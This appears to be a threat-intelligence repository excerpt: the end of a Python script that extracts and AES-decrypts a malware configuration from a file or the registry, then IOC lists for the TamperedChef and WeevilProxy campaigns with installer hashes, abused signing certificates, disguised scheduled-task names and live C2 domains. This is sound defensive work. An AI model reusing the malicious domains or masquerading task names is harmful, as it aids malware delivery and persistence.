 90 |         print(f'Extracted config from value "Seed" in HKCU\\{base_path}\\{aValue_name}:\n{config}')
 91 | 
 92 | 
 93 | def decrypt_aes(encrypted_data, key):
 94 |     iv = b'\x00'*16
 95 |     cipher = AES.new(
 96 |         key,
 97 |      AES.MODE_CBC,
 98 |      IV=iv)
 99 |     return cipher.decrypt(encrypted_data)
100 | 
101 | if __name__ == "__main__":
102 |     if is_file_provided():
103 |         try:
104 |             print(f'Extracting config from input file {sys.argv[1]}...')
105 |             file_data = read_file()
106 |             pe = pefile.PE(data=file_data)
107 |             parse_config_binary(file_data, pe)
108 |         except Exception as e:
109 |             print('Error extracting config from file')
110 |             print(e)
111 |     else:
112 |         try:
113 |             print('Extracting config from local registry...')
114 |             parse_config_registry()
115 |         except Exception as e:
116 |             print('Error extracting config from registry')
117 |             print(e)


--------------------------------------------------------------------------------
/TamperedChef/TamperedChef_IOC.csv:
--------------------------------------------------------------------------------
 1 | category,subtype,indicator,version_or_installer_type,serial,CN,thumbprint
 2 | PDF Editor,MSI package,0826824694c80b854603f4c4103133113a197d3ecbca4308899ae9d6f05847fa,,,,
 3 | PDF Editor,MSI package,08ea829d5c97aab089abe19686d274f829aa1cee3670d2819885e33f39a4d602,,,,
 4 | PDF Editor,MSI package,105e58c4c04b56607badd705411e3322c152b8dbb21d994e7cdec62253a0e454,,,,
 5 | PDF Editor,MSI package,244251cab1f6df4bb39ba28645cbc4e26f84298b588b568a796d6520912c6156,,,,
 6 | PDF Editor,MSI package,26163c7da9f0d9000937663497d7eb15df5c205cc2edbb71d664f08a5b1f80ce,,,,
 7 | PDF Editor,MSI package,2a3f76fc7f953403653eff71f21c16d40512c1bcd7a038657bb1d0a4efbee677,,,,
 8 | PDF Editor,MSI package,2bfa87dee2000f4e7889174f051ab88f4b690d08629b94721e321c44b7cf1bd3,,,,
 9 | PDF Editor,MSI package,2c9895fbdf8b86715a8e501f85d206b28cf9b61478826409a8a8ea17a067da22,,,,
10 | PDF Editor,MSI package,35c34043a4a8b1f15ce9ab7661be6ace91348f725d59e53f04a36c41999812c7,,,,
11 | PDF Editor,MSI package,3d4bdd41ebc630b8b676fc39e14de75a59cebf545cf342a4dea8072f5768c13e,,,,
12 | PDF Editor,MSI package,406e26453a9eb779da6dd792e82cf904fbaf11b9e15471316276bb49098bdbf6,,,,
13 | PDF Editor,MSI package,504a614d8baae84c7c57e1786d22981fb016e4c9396ab10cc73197aa483d9261,,,,
14 | PDF Editor,MSI package,6438b3c4eb5810c003d6f2cf1712652d3ce0504f08ae05aec1f07594e0a58a52,,,,
15 | PDF Editor,MSI package,6c4e54bbf98113068bdeef172ae6fb05fe1e99bb50ae4622b06e06af35b2b043,,,,
16 | PDF Editor,MSI package,6e4cd57e87e034723d4c1a3ff93e8c9def0f27961da3e5bc361536e847a119cb,,,,
17 | PDF Editor,MSI package,898aa0bca40ec01d3564cb33f7a79f2e651f987ea65db913a62d427973ba5478,,,,
18 | PDF Editor,MSI package,94acbfe1958b1b985701c8232fd3262ee01ef665ba59a92489b900d8f988b233,,,,
19 | PDF Editor,MSI package,9704e97a395649e9ea4450b3afde5c1f1b22caa05407c4db3ef1625b9db05324,,,,
20 | PDF Editor,MSI package,9f572779dba2ef760f8a2bd7391dcafc099c430bcbd94c7d5247b210e1f095da,,,,
21 | PDF Editor,MSI package,abb7541aba5abe1ff27b3867c1d45cea9c678743648ed8eed50bf32f8676e510,,,,
22 | PDF Editor,MSI package,af1185876d9d71955e6829f2475c1dce06d33522d0d0e66817d47b9318951314,,,,
23 | PDF Editor,MSI package,b66d89ee13a48e9c8d4a7aa2e3e1cb2b79f0b95e4f74f4184b85628656281588,,,,
24 | PDF Editor,MSI package,b9906cc6622a11fb67d5ad9db784dc9b62a0da5bd1fd4fe8887f74bfbbfe125d,,,,
25 | PDF Editor,MSI package,b9b4375c1992b71f9dc08ee613b2b316b8df8b9e1fdd2c7a1e98d89f43a1625f,,,,
26 | PDF Editor,MSI package,bfdb330a8c56def312154c44aed2b36705850adaf6febced8d6d7740beb27715,,,,
27 | PDF Editor,MSI package,c0308cc7c56443ad23fbb26671dc8f77d253e873f77c4c3d2486b34317feb417,,,,
28 | PDF Editor,MSI package,c4f0b51308eb02c20e9bb33df80442b85b0cc0ad3ccf2598546d67c49242d506,,,,
29 | PDF Editor,MSI package,cdf51e7f8f24b01bed83da50839b15f143569740c88c2033c43cfc9c17c1b5c8,,,,
30 | PDF Editor,MSI package,d162b02a9163fc68ece3db162af0da2c33a595e2258aff171064a5383f41a566,,,,
31 | PDF Editor,MSI package,e11aa8dd0b0bc4c21cb081f70565225abc192159f7deb4396aec5720941841ae,,,,
32 | PDF Editor,MSI package,f145e61e5d89f51fd3b94fef3e8bc2571aeae4c91c701751e9f603dfd5037dd9,,,,
33 | PDF Editor,MSI package,f181501175a30d5fce22af768321cd3de000bba5b19281f39abed236862a3107,,,,
34 | PDF Editor,MSI package,f748022beadc73f905f9cd2d5b94be2095265433f6c9770860facda2f6b623c6,,,,
35 | PDF Editor,MSI package,fbc7ffc5bdda978afe0f20910210752d91762b97d6d7719a5b3a1e352a4717c3,,,,
36 | PDF Editor,MSI package,fde67ba523b2c1e517d679ad4eaf87925c6bbf2f171b9212462dc9a855faa34b,,,,
37 | PDF Editor,"NSIS (obfuscated JS, malicious)",09207f1dfdd000b42b3433b85d051e8e446a1a1f2f63ab66d47edb9b196f618c,,,,
38 | PDF Editor,"NSIS (obfuscated JS, malicious)",231ddfa8114475892dd404f27b769ab2e43e9101ec7a7d3608546154a8b75d4d,,,,
39 | PDF Editor,"NSIS (obfuscated JS, malicious)",255062c602a36f649baaec922cc8b98b27854e8e90b6ee8ded660a2e4e101b77,,,,
40 | PDF Editor,"NSIS (obfuscated JS, malicious)",37bd388296f6c46e45aa42053758ae17328cfa677ac9ba41ef925d3c8bccfb99,,,,
41 | PDF Editor,"NSIS (obfuscated JS, malicious)",3c702aa9c7e0f2e6557f3f4ac129afd2ad4cfa2b027d6f4a357c02d4185359c4,,,,
42 | PDF Editor,"NSIS (obfuscated JS, malicious)",5273bcdeb88ae274294ce71831b63a54ea8b1dd55b4b2222b5eeb0f44150f931,,,,
43 | PDF Editor,"NSIS (obfuscated JS, malicious)",69b373084e47cbb54a9003ae2435adb49f184bfa11989a2800700da22a153dff,,,,
44 | PDF Editor,"NSIS (obfuscated JS, malicious)",6e8b48972fab5610363cf4063c289e1670a252fdd40c020de0e3cfcd33c819f4,,,,
45 | PDF Editor,"NSIS (obfuscated JS, malicious)",7dfa0774992032810660b413836e92f8ac3a4f6de5fa94c5f08c8159c34270e4,,,,
46 | PDF Editor,"NSIS (obfuscated JS, malicious)",83efb5f2688207a7ccf49ddb81cb094543c2fef5bf73f01342cc39b0af68e72b,,,,
47 | PDF Editor,"NSIS (obfuscated JS, malicious)",98bb0ab170efdf98414114d6c14a047d2144730f3552bb4aea36198fc49083ac,,,,
48 | PDF Editor,"NSIS (obfuscated JS, malicious)",a3fc5447a9638a3469bab591d6f94ee2bc9c61fc12fd367317eec60f46955859,,,,
49 | PDF Editor,"NSIS (obfuscated JS, malicious)",a696cf7cead8a2219559c802ecc395dcafd2e8f084bfcb8b011c0454519dc5f2,,,,
50 | PDF Editor,"NSIS (obfuscated JS, malicious)",afb0c6b4b0af0a14ac725c025ac70e8b2d8b392094ecdb10e8a2afe2ecf47ea8,,,,
51 | PDF Editor,"NSIS (obfuscated JS, malicious)",bcb46bf1c909958a09c52d22ca54dc281357e3c5bdc0f87a6f54553b7c31af9d,,,,
52 | PDF Editor,"NSIS (obfuscated JS, malicious)",c541cfe6baea9c48e44f808977846c2f2a2dab4cfcca677701ceac6d8fc4e1cc,,,,
53 | PDF Editor,"NSIS (obfuscated JS, malicious)",d3b7e26ed39783a6dd8fd107795d4afcf0a28dc5d9da1f4dd54ee905d9fb8f89,,,,
54 | PDF Editor,"NSIS (obfuscated JS, malicious)",da3c6ec20a006ec4b289a90488f824f0f72098a2f5c2d3f37d7a2d4a83b344a0,,,,
55 | PDF Editor,"NSIS (obfuscated JS, malicious)",f97c7edb0d8d9b65bf23df76412b6d2bbfbab6e3614e035789e4e1a30e40b7f1,,,,
56 | PDF Editor,"NSIS (non-obfuscated JS, clean)",847dd2b363fc02d1f501207074eb4eecdff19063cc0cd7adce1572b428f970d8,1.0.40,,,
57 | PDF Editor,"NSIS (non-obfuscated JS, clean)",bb3a744ac6a75e732dea1bd2110bc101205a2d19fdc7fbca82058f287cd61f3b,1.0.41,,,
58 | AppSuite-Print,"NSIS (obfuscated JS, malicious)",c6dddeb7286806a99a2f208d094298d7fcaaae3cfba0103f9e0fe02ff6759069,,,,
59 | pdfeditor.js,obfuscated (malicious),1bbf0e1323cff3168b548c4a80ec40fd3bed7630dccb7474ba4b8099df5e79d0,,,,
60 | pdfeditor.js,obfuscated (malicious),1dcd142daf1116b6a3fac113c638248bf2e0859bb55411cec2256e3d6e9e94ae,,,,
61 | pdfeditor.js,obfuscated (malicious),1e351bbae5338f24ce217ac182317ac7a4aee825cbaa5fe55cc347b650d2e987,,,,
62 | pdfeditor.js,obfuscated (malicious),216e604948812db2d5062b20504e9acaf271d745da544a2c5d074a5fbf111ac9,,,,
63 | pdfeditor.js,obfuscated (malicious),2a3a9ab2ad245d3464b5cc1bc8270568b5c490e4972e99e8f94ab2177874d81a,,,,
64 | pdfeditor.js,obfuscated (malicious),2fee5916dad509ff4fea4f4b17795677bda7316253111b2abf7f523bae2a973e,,,,
65 | pdfeditor.js,obfuscated (malicious),3ea32c0cb15693383604ac493638e38c43c82946e8fd33825e11d0b8a19d2e60,,,,
66 | pdfeditor.js,obfuscated (malicious),41dd100a033fb11430c6f656af92aa97894aa63832171d32dc70c90e8c2733ee,,,,
67 | pdfeditor.js,obfuscated (malicious),4de81d968d1c032a49d48d6a67ca282d0b1702167e158b374896f2f04fe3ca83,,,,
68 | pdfeditor.js,obfuscated (malicious),645e96594ec5fd50ed2d50fa7de20f33dc15ce4c13aecc5564a051f24770b4bb,,,,
69 | pdfeditor.js,obfuscated (malicious),a68cb60c61cb31cbe23abe885ca4bd8694e2bd2dcbbd86d12a4fbf6b0cbd0a37,,,,
70 | pdfeditor.js,obfuscated (malicious),a92b89e5f05393f4844b85681cf5df63b9eb0ca49bb916dd60ed133eb9727bb3,,,,
71 | pdfeditor.js,obfuscated (malicious),ac1042c8e64165945b0b07972b16d9d6d0235110d9ff0701f889fcc30cfa4859,,,,
72 | pdfeditor.js,obfuscated (malicious),b3ef2e11c855f4812e64230632f125db5e7da1df3e9e34fdb2f088ebe5e16603,,,,
73 | pdfeditor.js,obfuscated (malicious),cc5f29470a11fadf33e39fc0561ae781b1759ff3a314251111356fe51007945e,,,,
74 | pdfeditor.js,obfuscated (malicious),e954548717c4c538b53ae4cc845cbfe5406b78ede79e4fd509ad2f2dfc4429ab,,,,
75 | pdfeditor.js,obfuscated (malicious),f3f6d8f2d22040811bd3d06f488cd84f146f3093d6ac79bf68cc522e73c88765,,,,
76 | appsuite-print.js,obfuscated (malicious),136836f64f7559868e01db4cbbef9f90f81bdea1278d6605fa13654134279e0c,,,,
77 | Utilityaddon.node,,6022fd372dca7d6d366d9df894e8313b7f0bd821035dd9fa7c860b14e8c414f2,,,,
78 | Utilityaddon.node,,9becf480290d3ae7d368d291999c81aa9f47944a90633567e54c4049bcfa3eb4,,,,
79 | Utilityaddon.node,,2e846b8861d66d9bcaaf9615dc03798cf7f9c3231f2a1d2d31e3e652b954d4f5,,,,
80 | S3-Forge,installer,58273bdab14074b1ee6592116d3611a625c3dad5fcad004ca2a32962950ff845,Squirrel,,,
81 | S3-Forge,installer,5dddeedb394e61817ca8c8abe09532b0c8c5e1f9f4c08cedc5b62dd5e8e83505,Squirrel,,,
82 | S3-Forge,installer,86a6b355d86fb0d3544b9bdd00a90b308f2efb63abf6845c70d8acd87603e23d,NSIS,,,
83 | S3-Forge,installer,be138ec40b1061ff0de92942d2496f6ae9cf98e6f173eb4d58fdf982a8d0648a,Squirrel,,,
84 | S3-Forge,installer,b0f8fcb1622eef0a6b398425dd13cbf608771ba2042f32ec3282933a141eec77,,,,
85 | C&C domains,,5b7crp[.]com,,,,
86 | C&C domains,,9mdp5f[.]com,,,,
87 | C&C domains,,abf26u[.]com,,,,
88 | C&C domains,,mka3e8[.]com,,,,
89 | C&C domains,,y2iax5[.]com,,,,
90 | Signing certificates,SHA256,16f854f6399f1c104446d3a3e2d25eb2088bf665186d892903f50ff4ed994181,,582C3A4B9934B7EC1028B638,Echo Infini Sdn. Bhd.,A2278EB6A438DC528F3EBFEB238028C474401BEF
91 | Signing certificates,SHA256,b8bbf5aecfe0f437758f3f200539e51acfccf5ad9212c20967cfa4037b5a7e0d,,3474143F285FC35B0B1AE6AB407160D1,ECHO INFINI SDN. BHD.,7533D9D9C5241D0E031C21304C6A3FF064F79072
92 | Signing certificates,SHA256,4d986e01e40ebcc495a1c4d98d7ee370b787dbe05da2954c0d8d49c5dcd4b345,,3FEBAE41896885E91FDB20E0950C6054,ECHO INFINI SDN. BHD.,29338264019B62D11F9C6C4B5A69B78B899B4DF6
93 | Signing certificates,SHA256,ce27671c966d723f45522525fa4dd8912d09cae0f62b893870deb7ee1e7f4e0c,,28C7E66012DAB05A4A953D88F185ED2C,GLINT SOFTWARE SDN. BHD.,99201EEE9807D24851026A8E8884E4C40245FAC7
94 | Signing certificates,SHA256,018ea246585f9def1a14a2690afab6f9e8fcbf1febb6bf9b8463a204a50a5411,,3909D81C6A38BFFAC887D96C6593F51D,Byte Media Sdn. Bhd.,107316C0EBEC469482B99FB8935CDB2EC327DCAA
95 | Signing certificates,SHA256,003a69a0a2de87bcfd3982da1068478a8c2828eb07dc24edd93b419eb37d1980,,0DEFC375DC6DCDAED0CE4B249127755A,Summit Nexus Holdings LLC,76C675514EEC3A27A4E551A77ED30FBB0DC43A01
96 | Signing certificates,SHA256,800a745e7a9f34064b79408aeac2b87515c49e5627dc344124c017ce86f43d3c,,71F4DED233C732913D3EF342,Byte Media Sdn. Bhd.,17F77710C888E30917F71F7909086BCC2D131F61
97 | Signing certificates,SHA256,1946d13a16aed7247ed341db933f34b61fc9bb1dcdbd81102c9c54f0ba566851,,3F744CB0496EB63557494B807C0681BE,Byte Media Sdn Bhd,61CE7E9E22608EBC708C42B1CE5E842395C437D1


--------------------------------------------------------------------------------
/WeevilProxy/weevilproxy_iocs.csv:
--------------------------------------------------------------------------------
  1 | Type,Value,Note
  2 | Name,Optyprism Limited,Certificate name - used to sign MSI installer
  3 | SHA1,7bb22a166d2b74cf6b2682aad92c934705c07978,Certificate thumbprint - used to sign MSI installer
  4 | Name,LLC DITRIX,Certificate name - used to sign MSI installer
  5 | SHA1,d7340b019c3fc16fa659325eb16ac4821fd7d070,Certificate thumbprint - used to sign MSI installer
  6 | Name,IT Consulting Timo Lehtinen Oy,Certificate name - used to sign MSI installer
  7 | SHA1,84a6bcf027ba5dfe74586f937a437ba6d2309e17,Certificate thumbprint - used to sign MSI installer
  8 | Name,LLC Kraft Market,Certificate name - used to sign MSI installer
  9 | SHA1,a8f4f99311a9b3b59e85a4c2387554638476326d,Certificate thumbprint - used to sign MSI installer
 10 | Name,LLC MIR RTI,Certificate name - used to sign MSI installer
 11 | SHA1,3b14310ad7309b43405b3b8c94bdb977a4ad84e8,Certificate thumbprint - used to sign MSI installer
 12 | Name,LLC Promtrade,Certificate name - used to sign MSI installer
 13 | SHA1,eabe656511cb509b2ef42fc86077010c40f03ff2,Certificate thumbprint - used to sign MSI installer
 14 | Name,LLC Torgovyi Dom Energia,Certificate name - used to sign MSI installer
 15 | SHA1,7eb16b979b013fbc4fd343342e533492b8cb6af6,Certificate thumbprint - used to sign MSI installer
 16 | Name,LLC Gazovaya Kompaniya,Certificate name - used to sign MSI installer
 17 | SHA1,a301adb5bc8db6096b09e729c1e420580652dfb9,Certificate thumbprint - used to sign MSI installer
 18 | Name,LLC Stroytorg,Certificate name - used to sign MSI installer
 19 | SHA1,17e9e652b7ec3d4bbb726cda4b8ee0e3490936b2,Certificate thumbprint - used to sign MSI installer
 20 | Name,MicrosoftEdgeUpdate,One of the earliest scheduled task names
 21 | Name,ChromeUserAgentUpdater,One of the earliest scheduled task names
 22 | Name,MicrosoftPathAgentLegacy,Example of scheduled task name
 23 | Name,AMDSoftwareHealthCheckerV2,Example of scheduled task name
 24 | Name,OneDriveInstallerTask,Example of scheduled task name
 25 | Name,MicrosoftPathUpdaterV2,Example of scheduled task name
 26 | Name,EdgePathHealthCheckerV12,Example of scheduled task name
 27 | Name,AMDUpdaterLatest,Example of scheduled task name
 28 | Name,SystemVersionInstallerLegacy,Example of scheduled task name
 29 | Name,AMDVersionHealthCheckerLegacy,Example of scheduled task name
 30 | Name,DomainAuthHost,Staging folder name
 31 | SHA1,a5228797c09cee8cccfcddc5a2ace144d5302cc2,"Signed MSI installer used for malware delivery, masqeurading as Binance"
 32 | SHA1,f27ad93a2cb8fd8a4539392b65f06495054d692c,"Signed MSI installer used for malware delivery, masqeurading as Remitano"
 33 | SHA1,e863c0605a3605609d2a78ba667823901f560516,"Signed MSI installer used for malware delivery, masqeurading as OKX"
 34 | SHA1,22211d985ba231c67cb0d28ce6a66b0e7d2801e9,"Signed MSI installer used for malware delivery, masqeurading as TradingView"
 35 | SHA1,f312464d947e0add1ff14e6ad96c7944385af462,"Signed MSI installer used for malware delivery, masqeurading as TradingView"
 36 | SHA1,16db7c7db12190a3babb72dbfe525f6f1cc27ddb,"MSI installer used for malware delivery, masquerading as BullVpn"
 37 | SHA1,abd1e3b381bcbf6b952d857a67573d40e22c7fcf,"MSI installer used for malware delivery, masquerading as BullVpn"
 38 | SHA1,13974454b87fdd8c88589f34d3a1aff9328e3594,"MSI installer used for malware delivery, masquerading as BullVpn"
 39 | SHA1,95511d91022d2675d16ae73d17941057bbd24cf6,"MSI installer used for malware delivery, masquerading as BullVpn"
 40 | SHA1,54dcbf0b771c262819b55b42c151e14d2567ad9d,"MSI installer used for malware delivery, masquerading as Bybit"
 41 | SHA1,68a9829afaa63dad4f7d4b3ec537571805294556,"MSI installer used for malware delivery, masquerading as Bybit"
 42 | SHA1,06b11e742491e56f931334686ae2398649ac50f1,"MSI installer used for malware delivery, masquerading as Bybit"
 43 | SHA1,1a0989622ef23b1a2fb159a4a46a23f556a35826,"MSI installer used for malware delivery, masquerading as Bybit"
 44 | SHA1,ccfdb6f5da8a53cc8a77db034c1465151f0b71da,"MSI installer used for malware delivery, masquerading as Bybit"
 45 | SHA1,fec66428200a6cbcb07fe1c1af286a842d06415b,"MSI installer used for malware delivery, masquerading as Bybit"
 46 | SHA1,b2af64bb36292eb3697b9bbfd9429fe9051f07e1,"MSI installer used for malware delivery, masquerading as Bybit"
 47 | SHA1,b398f2fee00f6668bb7334a8f24ad426abaed5d4,"MSI installer used for malware delivery, masquerading as Bybit"
 48 | SHA1,ab0168f7c0cb0f2d11743a00875302dd471572fa,"MSI installer used for malware delivery, masquerading as Bybit"
 49 | SHA1,d80955ed1eb3568c5d9f9543d860b23c4817e005,"MSI installer used for malware delivery, masquerading as Bybit"
 50 | SHA1,e1c3787ee85c1ab13e8bc669e16aa10db2a17ddd,"MSI installer used for malware delivery, masquerading as Bybit"
 51 | SHA1,22f36a3c64fd9a48d44e6c90c5258953e137f5fa,"MSI installer used for malware delivery, masquerading as Bybit"
 52 | SHA1,027b93cc9c0a04d97adbbb9d6186e36e03a501b9,"MSI installer used for malware delivery, masquerading as Bybit"
 53 | SHA1,f909c7cba414fe9cd63955e159fd73e6922eb849,"MSI installer used for malware delivery, masquerading as Bybit"
 54 | SHA1,0879e40e3647bbf979364c1609285bfc30c3b069,"MSI installer used for malware delivery, masquerading as Bybit"
 55 | SHA1,7bcd6fd589dd066460383a5a938d22ae3444ecd0,"MSI installer used for malware delivery, masquerading as Bybit"
 56 | SHA1,58af67510873b8c614d0848ff39f2145d6d209dc,"MSI installer used for malware delivery, masquerading as Bybit"
 57 | SHA1,d3795c07d7d23df6c8f5c75b3e62d3fa0a0764dc,"MSI installer used for malware delivery, masquerading as Bybit"
 58 | SHA1,51bee72c8063f4017d6920450ea586a700acb896,"MSI installer used for malware delivery, masquerading as Bybit"
 59 | SHA1,563c8b4c6e4e8bf84e3968c50f64acaba9a11bd2,"MSI installer used for malware delivery, masquerading as Bybit"
 60 | SHA1,39fab7747ce9e24869cc44ff6ee04b9b17f6710c,"MSI installer used for malware delivery, masquerading as Bybit"
 61 | SHA1,e2d76f737e5261ee7d5fa18f3a3e2d12e2912756,"MSI installer used for malware delivery, masquerading as Bybit"
 62 | SHA1,45fdab5d0ebbbc96504acea81554c88ed2fec114,"MSI installer used for malware delivery, masquerading as Bybit"
 63 | SHA1,97c45537456126dbabdaaa204280a4b7269a3c1f,"MSI installer used for malware delivery, masquerading as Bybit"
 64 | SHA1,49b10144ab5f125eda76e3a4f55cbc2598a47673,"MSI installer used for malware delivery, masquerading as Bybit"
 65 | SHA1,f922b756fe091a4b0f35e910fd4e543e8c18a2da,"MSI installer used for malware delivery, masquerading as Bybit"
 66 | SHA1,e5fdfef34a0577e15d7a6c8c22bbd3dd7b68464a,"MSI installer used for malware delivery, masquerading as Bybit"
 67 | SHA1,91447e0b38d7f3d8e4573cdbfa27b640dc01d0a2,"MSI installer used for malware delivery, masquerading as Bybit"
 68 | SHA1,a9a3c9fa3c8b9a19bc43b567fa6384729f2e1f7f,"MSI installer used for malware delivery, masquerading as Bybit"
 69 | SHA1,d20d206b84b1d8c81859ec6e47fa49a1535b2ff9,"MSI installer used for malware delivery, masquerading as Bybit"
 70 | SHA1,a748731cc45c9eb8cefc918d8f79245a49083946,"MSI installer used for malware delivery, masquerading as Bybit"
 71 | SHA1,15cccc4368b175fe1f0e61ebfdcdb60a6c3cc017,"Signed MSI installer used for malware delivery, masquerading as Binance"
 72 | SHA1,a3a065f5a7111966da5258adbabb81638a0e50e3,"Signed MSI installer used for malware delivery, masquerading as Solana"
 73 | SHA1,7a618237f6bfa84ee1ec03115099f71177ac83ae,"Signed MSI installer used for malware delivery, masquerading as Pi Network"
 74 | SHA1,5160b8a4493555628747e06047181b8111ee2a6e,"Signed MSI installer used for malware delivery, masquerading as CoinMarketCap"
 75 | SHA1,2abf8eb9c84cff3dcd2aa974b893ed1f468a08a4,"Signed MSI installer used for malware delivery, masquerading as Telegram Wallet"
 76 | SHA1,341e7eeec13c9aa1272e659f2c06b70eafeeb2c0,"Signed MSI installer used for malware delivery, masquerading as MetaMask"
 77 | SHA1,71e0b927f01b92020864ab170956e8f6249683e7,"Signed MSI installer used for malware delivery, masquerading as DEX Screener"
 78 | SHA1,65c9c25116399ebbd5b8f484ecc3cb21cef9c2b5,"Signed MSI installer used for malware delivery, masquerading as eTor"
 79 | SHA1,8ec884781732f06e9241d43339e06ba80ba26c82,"Signed MSI installer used for malware delivery, masquerading as Revolut"
 80 | SHA1,c404f4a179b008e1e895ff7aad6c422b9f9bf878,"Signed MSI installer used for malware delivery, masquerading as BitGet"
 81 | SHA1,c3c02781b7588486b9f523d3c80586e7c24d0fa2,"Signed MSI installer used for malware delivery, masquerading as CoinsPH"
 82 | SHA1,b181034822caee68129de1bdab0810ee4fef141b,"Signed MSI installer used for malware delivery, masquerading as PDAX"
 83 | SHA1,f325bfa72898a549a1306900cde37b8e7bdd2b5f,"Signed MSI installer used for malware delivery, masquerading as BitcoinVN"
 84 | SHA1,b9ea520027340ae95bc8a2f4283b1a46d2d6d774,"Signed MSI installer used for malware delivery, masquerading as OKX"
 85 | SHA1,9f2c681e8439331bb39638531f5e182937f325f4,"Signed MSI installer used for malware delivery, masquerading as Bitkub"
 86 | SHA1,270ee9e05723ef672874ef958ca9b0c43a1080fc,"Signed MSI installer used for malware delivery, masquerading as Phantom"
 87 | SHA1,606a82c0bca19cf9dc7ebf205fd22b1fbe986ba7,"Signed MSI installer used for malware delivery, masquerading as Remitano"
 88 | SHA1,1a15f6378ef7581852d8a9071baa5bd24c8edc35,"Signed MSI installer used for malware delivery, masquerading as TradingView"
 89 | SHA1,6ee164b9deebb9ca6c0db1801c793a3b538dff3f,"Signed MSI installer used for malware delivery, masquerading as Binance"
 90 | SHA1,602c73dd257c7c2aaa996811fcf82ee4cd9654e1,"Signed MSI installer used for malware delivery, masquerading as Bybit"
 91 | SHA1,37b2a17d086e5541b052a0f4019320e87d0fec72,"Signed MSI installer used for malware delivery, masquerading as Kraken"
 92 | SHA1,5d0069049cd840a76ef6297f4e27490d07e1d79a,"Signed MSI installer used for malware delivery, masquerading as DoTrade"
 93 | SHA1,96099aced1b2724dd7fc56f6978802b87aeebaab,Example of SmokeLoader infection chain leading to WeevilProxy
 94 | Domain name,dns-resolve.pages.dev,Serves the bundled malware (build.zip) and manifest (manifest.json)
 95 | Domain name,resolve-ns.pages.dev,Serves the bundled malware (build.zip) and manifest (manifest.json)
 96 | Domain name,hasv.pages.dev,Serves the bundled malware (build.zip) and manifest (manifest.json)
 97 | Domain name,r2.ohyoulookstupid.win,Serves the bundled malware (build.zip) and manifest (manifest.json)
 98 | Domain name,test-ex-1.pages.dev,Serves the bundled malware (build.zip) and manifest (manifest.json)
 99 | Domain name,87-899.help,"Intermediate C2, serving follow-up scripts to loader"
100 | Domain name,foo-foo.bar,"Intermediate C2, serving follow-up scripts to loader"
101 | Domain name,pffffer.icu,"Intermediate C2, serving follow-up scripts to loader"
102 | Domain name,supernegro.mom,"Intermediate C2, serving follow-up scripts to loader"
103 | Domain name,asvufw.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
104 | Domain name,adumktsa.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
105 | Domain name,printscreen.lol,"Intermediate C2, serving follow-up scripts to loader"
106 | Domain name,qcaqnzvt.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
107 | Domain name,twisted.mom,"Intermediate C2, serving follow-up scripts to loader"
108 | Domain name,luiowitz.cfd,"Intermediate C2, serving follow-up scripts to loader"
109 | Domain name,runt.monster,"Intermediate C2, serving follow-up scripts to loader"
110 | Domain name,schilllr.icu,"Intermediate C2, serving follow-up scripts to loader"
111 | Domain name,paid-rewards.lol,"Intermediate C2, serving follow-up scripts to loader"
112 | Domain name,drzjpnod-97b.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
113 | Domain name,wkegibkjntqejdk.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
114 | Domain name,1.asvufw.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
115 | Domain name,gentle-firefly-9577.asvufw.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
116 | Domain name,wispy-field-a970.adumktsa.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
117 | Domain name,test.asvufw.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
118 | Domain name,square-lake-8a43.qcaqnzvt.workers.dev,"Intermediate C2, serving follow-up scripts to loader"
119 | Domain name,supercharming.com,"Intermediate C2, serving follow-up scripts to loader"
120 | Domain name,dockmilk.com,"Intermediate C2, serving follow-up scripts to loader"
121 | Domain name,18-22-59.com,"Intermediate C2, serving follow-up scripts to loader"
122 | Domain name,firewall-813.com,"Intermediate C2, serving follow-up scripts to loader"
123 | Domain name,csgo-play-de.com,"Intermediate C2, serving follow-up scripts to loader"
124 | Domain name,lovely-race.com,"Intermediate C2, serving follow-up scripts to loader"
125 | Domain name,external-sex.com,"Intermediate C2, serving follow-up scripts to loader"
126 | Domain name,timing-kings.com,"Intermediate C2, serving follow-up scripts to loader"
127 | Domain name,local-mailer.com,"Intermediate C2, serving follow-up scripts to loader"
128 | Domain name,taylor-convert.com,"Intermediate C2, serving follow-up scripts to loader"
129 | Domain name,experimental-tech.com,"Intermediate C2, serving follow-up scripts to loader"
130 | Domain name,grpc-test.me,"Intermediate C2, serving follow-up scripts to loader"
131 | Domain name,wcpxlare.win,Main payload's C2 domain
132 | Domain name,1849.st,Main payload's C2 domain
133 | Domain name,carplay-link.com,Main payload's C2 domain
134 | Domain name,vertical-scaling.com,Main payload's C2 domain
135 | Domain name,llm-0014.com,Main payload's C2 domain
136 | Domain name,7777-202.com,Main payload's C2 domain
137 | Domain name,ggr-lach.com,Main payload's C2 domain
138 | Domain name,hat-kett.com,Main payload's C2 domain
139 | SHA1,1026ec6a755ee9736aadaac23e5fab89c0c15e1c,CustomAction - CustomAction1.dll
140 | SHA1,3c23e1e32750a30f49a07ae9ce390c947f5804d7,CustomAction - CustomAction1.dll
141 | SHA1,d353332212fac0d84e8810f53ecb8894e5c42bc3,CustomAction - CustomAction1.dll
142 | SHA1,0be5f1f42606cf96f8a4eee711eaa17356f2608d,CustomAction - CustomAction1.dll
143 | SHA1,30cfc7fab781eb674030d5e91a602000821fa501,CustomAction - CustomAction1.dll
144 | SHA1,fc8507f2c0266f51cbff407e2363d764c3412e8b,CustomAction - CustomAction1.dll
145 | SHA1,bb6b067aa56e0a0bca9a9c654411ea511affc6db,CustomAction - CustomAction1.dll
146 | SHA1,bf48b6c934a72df2e2a8aa1aa35d8ca8b26cb003,CustomAction - CustomAction1.dll
147 | SHA1,11b96d1efaa7ca9306dcc78762632a704f7a28b9,CustomAction - CustomAction1.dll
148 | SHA1,723075081859751a2e23c9ae14d5eb2ca6877a1c,CustomAction - CustomAction1.dll
149 | SHA1,eb158e6279f6235aa7045bc5bea9a715707ecd4a,CustomAction - CustomAction1.dll
150 | SHA1,611f10f7e5842390a804f7cefca4aa27ea984a30,CustomAction - CustomAction1.dll
151 | SHA1,290711b106d713691ea647489589dbf777e37263,CustomAction - CustomAction1.dll
152 | SHA1,0bb2e9bf6e8dc097f9f7602f965af099c047d85f,CustomAction - CustomAction1.dll
